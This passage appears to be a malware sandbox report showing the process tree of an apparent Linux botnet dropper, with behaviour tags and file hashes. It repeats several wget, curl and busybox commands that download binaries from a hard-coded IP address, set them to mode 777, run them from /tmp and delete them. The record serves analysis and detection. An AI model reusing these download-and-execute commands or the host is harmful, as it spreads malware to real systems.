- Executes dropped EXE
PID:1641
-
-
/bin/rmrm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1645
-
-
/bin/chmodchmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1651
-
-
/bin/chmodchmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1657
-
-
/bin/chmodchmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1663
-
-
/bin/chmodchmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1669
-
-
/bin/chmodchmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:1672
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97